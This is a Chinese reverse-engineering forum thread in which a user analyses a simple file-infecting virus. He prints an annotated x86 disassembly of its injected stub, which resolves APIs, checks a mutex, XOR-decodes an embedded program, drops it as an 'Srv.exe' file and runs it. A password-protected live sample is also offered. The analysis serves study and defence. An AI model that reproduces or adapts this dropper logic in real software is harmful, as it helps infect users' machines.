吾爱汇编

 找回密码
 立即注册

QQ登录

绑定QQ避免忘记帐号

查看: 6558|回复: 26

[原创逆向图文] 某个简单的病毒的分析

  [复制链接]
F8LEFT 发表于 2014-10-7 16:16 | 显示全部楼层 |阅读模式

本帖最后由 F8LEFT 于 2014-10-7 16:15 编辑

        大家好我是F8,菜鸟一个,求朋友一同研究技术。

        最近得到了一个简单的病毒,所以就顺手研究了一下,实际上没有多大的技术含量,大家将就着看吧。
        当然,我只看了被它感染后的文件的操作而已,代码非常的简洁,连个跳转都没有,所以挺好分析的。哈哈
       废话不多说了,下面正式开始吧。
-----------------------分割线------------------------------------------分割线----------------------------------分割线---------------------------
  1. 10011000 >  60              PUSHAD                                          ; 保存寄存器
  2. 10011001    E8 00000000     CALL    PhysXDev.10011006                       ;      --> call下一行
  3. 10011006    5D              POP     EBP                                     ; 取得当前相对地址 10011006
  4. 10011007    8BC5            MOV     EAX, EBP                                ; 用eax来保存地址
  5. 10011009    81ED 326F0120   SUB     EBP, 0x20016F32
  6. 1001100F    2B85 50720120   SUB     EAX, DWORD PTR SS:[EBP+0x20017250]      ;  eax -= [10011006 - 20016f32 + 20017250] = [10011324] = 6 = ModuleEntryPoint
  7. 10011015    8985 4C720120   MOV     DWORD PTR SS:[EBP+0x2001724C], EAX      ; 写入入口点 :[10011320] = [10011006 - 20016f32 + 2001724c]
  8. 1001101B    B0 00           MOV     AL, 0x0
  9. 1001101D    8685 9E740120   XCHG    BYTE PTR SS:[EBP+0x2001749E], AL        ; 取出 flag:[10011572] = [10011006 - 20016F32 + 2001749E] --> al,
  10. 10011023    3C 01           CMP     AL, 0x1                                 ; 判断恶意代码是否需要执行
  11. 10011025    0F85 DE020000   JNZ     <PhysXDev.End>                          ; 下面的[Ebp + XXXXXXXX]均是用来定位模块的相对数据的,当前ebp = 10011006 - 20016F32,再加上一个相近的数,实际上是相对地址10011006加上一个偏移。这样就算模块不是加载在10000000也可以定位数据
  12. 1001102B    8B85 4C720120   MOV     EAX, DWORD PTR SS:[EBP+0x2001724C]      ;     取回模块入口点,ModuleEntryPoint
  13. 10011031    2B85 58720120   SUB     EAX, DWORD PTR SS:[EBP+0x20017258]      ; 计算得到LoadLibraryA地址,这里的API地址是原来dll就拥有的
  14. 10011037    8B00            MOV     EAX, DWORD PTR DS:[EAX]                 ; 取出地址LoadLibraryA
  15. 10011039    8985 EA730120   MOV     DWORD PTR SS:[EBP+0x200173EA], EAX      ; 写入到壳的IAT表中,[100114BE] = Addr: LoadLibraryA
  16. 1001103F    8B85 4C720120   MOV     EAX, DWORD PTR SS:[EBP+0x2001724C]      ;     取ModuleEntryPoint
  17. 10011045    2B85 5C720120   SUB     EAX, DWORD PTR SS:[EBP+0x2001725C]      ; 取原dll的API: GetProcAddress
  18. 1001104B    8B00            MOV     EAX, DWORD PTR DS:[EAX]
  19. 1001104D    8985 F2730120   MOV     DWORD PTR SS:[EBP+0x200173F2], EAX      ; 写入到壳的IAT表中:[100114C6] = GetProcAddress
  20. 10011053    83BD F2730120 0>CMP     DWORD PTR SS:[EBP+0x200173F2], 0x0
  21. 1001105A    0F84 A9020000   JE      <PhysXDev.End>
  22. 10011060    83BD EA730120 0>CMP     DWORD PTR SS:[EBP+0x200173EA], 0x0
  23. 10011067    0F84 9C020000   JE      <PhysXDev.End>                          ; 检查前面取的API地址是否有效,下面开始装载壳需要的API
  24. 1001106D    8D85 8D740120   LEA     EAX, DWORD PTR SS:[EBP+0x2001748D]
  25. 10011073    50              PUSH    EAX                                     ;    str:"kernel32.dll"
  26. 10011074    FF95 EA730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173EA]      ; --> LoadLibraryA "kernel32.dll"
  27. 1001107A    83F8 00         CMP     EAX, 0x0                                ;       --> 检查是否成功加载dll
  28. 1001107D    0F84 86020000   JE      <PhysXDev.End>
  29. 10011083    8985 E6730120   MOV     DWORD PTR SS:[EBP+0x200173E6], EAX      ;     --> 写入dll基地址(hDll)
  30. 10011089    8D85 16740120   LEA     EAX, DWORD PTR SS:[EBP+0x20017416]
  31. 1001108F    50              PUSH    EAX                                     ;    Str:"FreeLibrary"
  32. 10011090    FFB5 E6730120   PUSH    DWORD PTR SS:[EBP+0x200173E6]           ;    hDll
  33. 10011096    FF95 F2730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173F2]      ; --> GetProcAddress (hDll, "FreeLibrary")
  34. 1001109C    83F8 00         CMP     EAX, 0x0
  35. 1001109F    0F84 58020000   JE      <PhysXDev.End2>
  36. 100110A5    8985 EE730120   MOV     DWORD PTR SS:[EBP+0x200173EE], EAX      ; 写入IAT表[100114C2] = FreeLibrary
  37. 100110AB    8D85 22740120   LEA     EAX, DWORD PTR SS:[EBP+0x20017422]
  38. 100110B1    50              PUSH    EAX                                     ;    str:"CreateMutexA"
  39. 100110B2    FFB5 E6730120   PUSH    DWORD PTR SS:[EBP+0x200173E6]           ;    hDll
  40. 100110B8    FF95 F2730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173F2]      ; --> GetProcAddress (hDll, "CreateMutexA")
  41. 100110BE    83F8 00         CMP     EAX, 0x0
  42. 100110C1    0F84 36020000   JE      <PhysXDev.End2>
  43. 100110C7    8985 F6730120   MOV     DWORD PTR SS:[EBP+0x200173F6], EAX      ; 写入IAT表[100114CA] = CreateMutexA
  44. 100110CD    8D85 3B740120   LEA     EAX, DWORD PTR SS:[EBP+0x2001743B]
  45. 100110D3    50              PUSH    EAX                                     ;    str:"ReleaseMutex"
  46. 100110D4    FFB5 E6730120   PUSH    DWORD PTR SS:[EBP+0x200173E6]           ;    hDll
  47. 100110DA    FF95 F2730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173F2]      ; --> GetProcAddress (hDll, "ReleaseMutex")
  48. 100110E0    83F8 00         CMP     EAX, 0x0
  49. 100110E3    0F84 14020000   JE      <PhysXDev.End2>
  50. 100110E9    8985 FE730120   MOV     DWORD PTR SS:[EBP+0x200173FE], EAX      ; 写入IAT表[100114D2] = ReleaseMutex
  51. 100110EF    8D85 2F740120   LEA     EAX, DWORD PTR SS:[EBP+0x2001742F]
  52. 100110F5    50              PUSH    EAX                                     ;    str:"CloseHandle"
  53. 100110F6    FFB5 E6730120   PUSH    DWORD PTR SS:[EBP+0x200173E6]           ;    hDll
  54. 100110FC    FF95 F2730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173F2]      ; --> GetProcAddress (hDll, "CloseHandle")
  55. 10011102    83F8 00         CMP     EAX, 0x0
  56. 10011105    0F84 F2010000   JE      <PhysXDev.End2>
  57. 1001110B    8985 FA730120   MOV     DWORD PTR SS:[EBP+0x200173FA], EAX      ; 写入IAT表[100114CE] = CloseHandle
  58. 10011111    8D85 48740120   LEA     EAX, DWORD PTR SS:[EBP+0x20017448]
  59. 10011117    50              PUSH    EAX                                     ;    str:"GetLastError"
  60. 10011118    FFB5 E6730120   PUSH    DWORD PTR SS:[EBP+0x200173E6]           ;    hDll
  61. 1001111E    FF95 F2730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173F2]      ; --> GetProcAddress (hDll, "GetLastError")
  62. 10011124    83F8 00         CMP     EAX, 0x0
  63. 10011127    0F84 D0010000   JE      <PhysXDev.End2>
  64. 1001112D    8985 02740120   MOV     DWORD PTR SS:[EBP+0x20017402], EAX      ; 写入IAT表[100114D6] = GetLastError
  65. 10011133    8D85 55740120   LEA     EAX, DWORD PTR SS:[EBP+0x20017455]
  66. 10011139    50              PUSH    EAX                                     ;    str:"CreateFileA"
  67. 1001113A    FFB5 E6730120   PUSH    DWORD PTR SS:[EBP+0x200173E6]           ;    hDll
  68. 10011140    FF95 F2730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173F2]      ; --> GetProcAddress (hDll, "CreateFileA")
  69. 10011146    83F8 00         CMP     EAX, 0x0
  70. 10011149    0F84 AE010000   JE      <PhysXDev.End2>
  71. 1001114F    8985 06740120   MOV     DWORD PTR SS:[EBP+0x20017406], EAX      ; 写入IAT表[100114DA] = CreateFileA
  72. 10011155    8D85 61740120   LEA     EAX, DWORD PTR SS:[EBP+0x20017461]
  73. 1001115B    50              PUSH    EAX                                     ;    str:"WriteFile"
  74. 1001115C    FFB5 E6730120   PUSH    DWORD PTR SS:[EBP+0x200173E6]           ;    hDll
  75. 10011162    FF95 F2730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173F2]      ; --> GetProcAddress (hDll, "WriteFile")
  76. 10011168    83F8 00         CMP     EAX, 0x0
  77. 1001116B    0F84 8C010000   JE      <PhysXDev.End2>
  78. 10011171    8985 0A740120   MOV     DWORD PTR SS:[EBP+0x2001740A], EAX      ; 写入IAT表[100114DE] = WriteFile
  79. 10011177    8D85 6B740120   LEA     EAX, DWORD PTR SS:[EBP+0x2001746B]
  80. 1001117D    50              PUSH    EAX                                     ;    str:"GetModuleFileNameA"
  81. 1001117E    FFB5 E6730120   PUSH    DWORD PTR SS:[EBP+0x200173E6]           ;    hDll
  82. 10011184    FF95 F2730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173F2]      ; --> GetProcAddress (hDll, "GetModuleFileNameA")
  83. 1001118A    83F8 00         CMP     EAX, 0x0
  84. 1001118D    0F84 6A010000   JE      <PhysXDev.End2>
  85. 10011193    8985 0E740120   MOV     DWORD PTR SS:[EBP+0x2001740E], EAX      ; 写入IAT表[100114E2] = GetModuleFileNameA
  86. 10011199    8D85 7E740120   LEA     EAX, DWORD PTR SS:[EBP+0x2001747E]
  87. 1001119F    50              PUSH    EAX                                     ;    str:"CreateProcessA"
  88. 100111A0    FFB5 E6730120   PUSH    DWORD PTR SS:[EBP+0x200173E6]           ;    hDll
  89. 100111A6    FF95 F2730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173F2]      ; --> GetProcAddress (hDll, "CreateProcessA")
  90. 100111AC    83F8 00         CMP     EAX, 0x0
  91. 100111AF    0F84 48010000   JE      <PhysXDev.End2>
  92. 100111B5    8985 12740120   MOV     DWORD PTR SS:[EBP+0x20017412], EAX      ; 写入IAT表[100114E6] = CreateProcessA
  93. 100111BB    8D85 78720120   LEA     EAX, DWORD PTR SS:[EBP+0x20017278]      ; --------------------------------------------->
  94. 100111C1    50              PUSH    EAX                                     ;    str:"KyUffThOkYwRRtgPP"
  95. 100111C2    6A 01           PUSH    0x1
  96. 100111C4    6A 00           PUSH    0x0
  97. 100111C6    FF95 F6730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173F6]      ; CreateMutexA(0, 1, "KyUffThOkYwRRtgPP")
  98. 100111CC    50              PUSH    EAX
  99. 100111CD    FF95 02740120   CALL    NEAR DWORD PTR SS:[EBP+0x20017402]      ; GetLastError
  100. 100111D3    5B              POP     EBX
  101. 100111D4    50              PUSH    EAX
  102. 100111D5    53              PUSH    EBX
  103. 100111D6    53              PUSH    EBX
  104. 100111D7    FF95 FE730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173FE]      ; ReleaseMutex
  105. 100111DD    FF95 FA730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173FA]      ; CloseHandle
  106. 100111E3    58              POP     EAX
  107. 100111E4    3D B7000000     CMP     EAX, 0xB7                               ; 检查病毒进程是否已经存在
  108. 100111E9    0F84 0E010000   JE      <PhysXDev.End2>                         ; <--------------------------------------------------
  109. 100111EF    8B8D 9A740120   MOV     ECX, DWORD PTR SS:[EBP+0x2001749A]      ;  取病毒原程序长度
  110. 100111F5    8DBD 9E740120   LEA     EDI, DWORD PTR SS:[EBP+0x2001749E]      ;   取病毒原程序位置(被加密)
  111. 100111FB    47              INC     EDI
  112. 100111FC    BA 00000000     MOV     EDX, 0x0
  113. 10011201    0BD2            OR      EDX, EDX
  114. 10011203    75 07           JNZ     SHORT PhysXDev.1001120C
  115. 10011205    8B95 60720120   MOV     EDX, DWORD PTR SS:[EBP+0x20017260]      ; 取解码key长度
  116. 1001120B    4A              DEC     EDX
  117. 1001120C    8A9C2A 64720120 MOV     BL, BYTE PTR DS:[EDX+EBP+0x20017264]    ;   取对应的解码key[i]
  118. 10011213    321F            XOR     BL, BYTE PTR DS:[EDI]                   ;      病毒程序 xor key[i] = 还原程序
  119. 10011215    881F            MOV     BYTE PTR DS:[EDI], BL                   ;    写回原来的程序代码
  120. 10011217    47              INC     EDI
  121. 10011218    4A              DEC     EDX
  122. 10011219  ^ E2 E6           LOOPD   SHORT PhysXDev.10011201                 ; 循环解码,就只是简单的 xor 而已
  123. 1001121B    68 FF000000     PUSH    0xFF
  124. 10011220    8D85 92720120   LEA     EAX, DWORD PTR SS:[EBP+0x20017292]      ;  buffer for Name
  125. 10011226    50              PUSH    EAX
  126. 10011227    6A 00           PUSH    0x0
  127. 10011229    FF95 0E740120   CALL    NEAR DWORD PTR SS:[EBP+0x2001740E]      ;  GetModuleFileNameA(0, szName, 0xFF)
  128. 1001122F    8BC8            MOV     ECX, EAX                                ; 保存长度
  129. 10011231    8D9D 92720120   LEA     EBX, DWORD PTR SS:[EBP+0x20017292]      ; 取得当前程序名  -> 将转换为地址
  130. 10011237    03C3            ADD     EAX, EBX                                ; 定位到最后一个字符
  131. 10011239    FD              STD
  132. 1001123A    8BF8            MOV     EDI, EAX
  133. 1001123C    B0 2E           MOV     AL, 0x2E                                ;  ASCII"."
  134. 1001123E    F2:AE           REPNE   SCAS BYTE PTR ES:[EDI]                  ; 从后面开始进行扫描,扫到.为止
  135. 10011240    47              INC     EDI
  136. 10011241    FC              CLD
  137. 10011242    8DB5 8A720120   LEA     ESI, DWORD PTR SS:[EBP+0x2001728A]      ;   str "Srv.exe"
  138. 10011248    B9 08000000     MOV     ECX, 0x8
  139. 1001124D    F3:A4           REP     MOVS BYTE PTR ES:[EDI], BYTE PTR DS:[ES>; 进行字符窜的拼接
  140. 1001124F    6A 00           PUSH    0x0                                     ; 如,原来为 E:\LoadDll.exe 变为 E:\LoadDllSrv.exe
  141. 10011251    68 80000000     PUSH    0x80
  142. 10011256    6A 02           PUSH    0x2
  143. 10011258    6A 00           PUSH    0x0
  144. 1001125A    6A 02           PUSH    0x2
  145. 1001125C    68 00000040     PUSH    0x40000000
  146. 10011261    8D85 92720120   LEA     EAX, DWORD PTR SS:[EBP+0x20017292]
  147. 10011267    50              PUSH    EAX
  148. 10011268    FF95 06740120   CALL    NEAR DWORD PTR SS:[EBP+0x20017406]      ; CreateFileA(Name, 0x40000....,创建病毒文件
  149. 1001126E    83F8 FF         CMP     EAX, -0x1
  150. 10011271    0F84 86000000   JE      <PhysXDev.End2>
  151. 10011277    50              PUSH    EAX
  152. 10011278    8BD0            MOV     EDX, EAX
  153. 1001127A    6A 00           PUSH    0x0
  154. 1001127C    8D85 48720120   LEA     EAX, DWORD PTR SS:[EBP+0x20017248]
  155. 10011282    50              PUSH    EAX
  156. 10011283    FFB5 9A740120   PUSH    DWORD PTR SS:[EBP+0x2001749A]
  157. 10011289    8D9D 9E740120   LEA     EBX, DWORD PTR SS:[EBP+0x2001749E]
  158. 1001128F    43              INC     EBX
  159. 10011290    53              PUSH    EBX
  160. 10011291    52              PUSH    EDX
  161. 10011292    FF95 0A740120   CALL    NEAR DWORD PTR SS:[EBP+0x2001740A]      ; WriteFile(...........写病毒文件
  162. 10011298    FF95 FA730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173FA]      ; CloseHandle
  163. 1001129E    FC              CLD
  164. 1001129F    B9 44000000     MOV     ECX, 0x44
  165. 100112A4    8DBD 92730120   LEA     EDI, DWORD PTR SS:[EBP+0x20017392]
  166. 100112AA    B0 00           MOV     AL, 0x0
  167. 100112AC    F3:AA           REP     STOS BYTE PTR ES:[EDI]
  168. 100112AE    B9 10000000     MOV     ECX, 0x10
  169. 100112B3    8DBD D6730120   LEA     EDI, DWORD PTR SS:[EBP+0x200173D6]
  170. 100112B9    B0 00           MOV     AL, 0x0
  171. 100112BB    F3:AA           REP     STOS BYTE PTR ES:[EDI]
  172. 100112BD    8D85 D6730120   LEA     EAX, DWORD PTR SS:[EBP+0x200173D6]
  173. 100112C3    50              PUSH    EAX
  174. 100112C4    8D85 92730120   LEA     EAX, DWORD PTR SS:[EBP+0x20017392]
  175. 100112CA    50              PUSH    EAX
  176. 100112CB    6A 00           PUSH    0x0
  177. 100112CD    6A 00           PUSH    0x0
  178. 100112CF    6A 00           PUSH    0x0
  179. 100112D1    6A 00           PUSH    0x0
  180. 100112D3    6A 00           PUSH    0x0
  181. 100112D5    6A 00           PUSH    0x0
  182. 100112D7    8D85 92720120   LEA     EAX, DWORD PTR SS:[EBP+0x20017292]
  183. 100112DD    50              PUSH    EAX
  184. 100112DE    6A 00           PUSH    0x0
  185. 100112E0    FF95 12740120   CALL    NEAR DWORD PTR SS:[EBP+0x20017412]      ; CreateProcessA(。。。。运行刚才写入的病毒文件
  186. 100112E6    8DBD D6730120   LEA     EDI, DWORD PTR SS:[EBP+0x200173D6]
  187. 100112EC    FF37            PUSH    DWORD PTR DS:[EDI]
  188. 100112EE    FF77 04         PUSH    DWORD PTR DS:[EDI+0x4]
  189. 100112F1    FF95 FA730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173FA]      ; CloseHandle(进程)
  190. 100112F7    FF95 FA730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173FA]      ; CloseHandle(线程)
  191. 100112FD >  FFB5 E6730120   PUSH    DWORD PTR SS:[EBP+0x200173E6]           ;    hDll
  192. 10011303    FF95 EE730120   CALL    NEAR DWORD PTR SS:[EBP+0x200173EE]      ; FreeLibrary (kernel32.dll)
  193. 10011309 >  8B85 4C720120   MOV     EAX, DWORD PTR SS:[EBP+0x2001724C]
  194. 1001130F    2B85 54720120   SUB     EAX, DWORD PTR SS:[EBP+0x20017254]
  195. 10011315    894424 1C       MOV     DWORD PTR SS:[ESP+0x1C], EAX
  196. 10011319    61              POPAD                                           ; 得到原来的dll入口点
  197. 1001131A  - FFE0            JMP     NEAR EAX                                ; PhysXDev.10002A1F
复制代码
    请注意,附件的dll是一个病毒来的,请不要随便打开!!!!不看说明导致中毒的,还请不要怪我。。。
       附件解压密码:123




实例.rar

79.61 KB, 下载次数: 7, 下载积分: HB -3

病毒例子

评分

参与人数 33HB +48 THX +17 收起 理由
花盗睡鼠 + 2 + 1 [吾爱汇编论坛52HB.COM]-软件反汇编逆向分析,软件安全必不可少!
29590 + 1
虚心学习 + 1 [吾爱汇编论坛52HB.COM]-吃水不忘打井人,给个评分懂感恩!
24567 + 1
暮雨烟然 + 1
Jawon + 2
一路走来不容易 + 1
WolfKing + 1 [吾爱汇编论坛52HB.COM]-吃水不忘打井人,给个评分懂感恩!
Soul1999 + 1
娄胖胖 + 1
银河星光 + 1
风动鸣 + 1 [吾爱汇编论坛52HB.COM]-感谢楼主热心分享,小小评分不成敬意!
124713549 + 1
sjtkxy + 1 + 1
冷亦飞 + 1
消逝的过去 + 2
temp + 1 + 1
Wayne + 1 [吾爱汇编论坛52HB.COM]-吃水不忘打井人,给个评分懂感恩!
SmallEXpel + 1
在天一方 + 1 [吾爱汇编论坛52HB.COM]-学破解防破解,知进攻懂防守!
叶落花开 + 2
szukodf + 1 [吾爱汇编论坛52HB.COM]-学破解防破解,知进攻懂防守!
jaunic + 2
lies + 1
1683326201 + 2 + 1 [快捷评语] - 评分=感恩!简单却充满爱!感谢您的作品!
星宇天空 + 1 很详细
wdujs600 + 1 + 1 好人有好报!你的热心我永远不忘!谢谢!
才淑丶学谦 + 1 评分=感恩!简单却充满爱!感谢您的作品!
随心看看 + 1 感谢!新技能get√
晴雪我是苏苏 + 3 + 1 我很赞同!
天线宝宝 + 3 + 1 积极评分从我做起,感谢!
Shark恒 + 10 + 1 你将受到所有人的崇拜!
判官 + 5 + 1 Get!Thanks!

查看全部评分

吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
头像被屏蔽
邪恶小志 发表于 2014-10-7 16:28 | 显示全部楼层
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
Shark恒 发表于 2014-10-7 18:19 | 显示全部楼层

F8大大那牛X不是吹的,霸气!{:6_134:}
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
rain灿 发表于 2014-10-7 21:04 | 显示全部楼层
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
玩的心痛呀 发表于 2014-10-8 16:10 | 显示全部楼层

看不懂{:6_143:}
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
天线宝宝 发表于 2014-10-8 21:43 | 显示全部楼层
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
new882 发表于 2014-10-8 21:45 | 显示全部楼层

好样的 F8大大 厉害{:6_158:}
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
彡墨鱼灬丶 发表于 2014-10-9 19:10 | 显示全部楼层

好吧,我没看懂
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
chinmo 发表于 2014-10-10 14:46 | 显示全部楼层

{:6_150:},膜拜大牛啊,牛B哄哄的
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
王尼玛 发表于 2014-10-11 00:32 | 显示全部楼层

天书啊,看不懂
吾爱汇编论坛-学破解,防破解!知进攻,懂防守!逆向分析,软件安全!52HB.COM
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

警告:本站严惩灌水回复,尊重自己从尊重他人开始!

1层
2层
3层
4层
5层
6层
7层
8层
9层
10层

免责声明

吾爱汇编(www.52hb.com)所讨论的技术及相关工具仅限用于研究学习,皆在提高软件产品的安全性,严禁用于不良动机。任何个人、团体、组织不得将其用于非法目的,否则,一切后果自行承担。吾爱汇编不承担任何因为技术滥用所产生的连带责任。吾爱汇编内容源于网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑中彻底删除。如有侵权请邮件或微信与我们联系处理。

站长邮箱:SharkHeng@sina.com
站长QQ:1140549900


QQ|RSS|手机版|小黑屋|帮助|吾爱汇编 ( 京公网安备11011502005403号 , 京ICP备20003498号-6 )|网站地图

Powered by Discuz!

吾爱汇编 www.52hb.com

快速回复 返回顶部 返回列表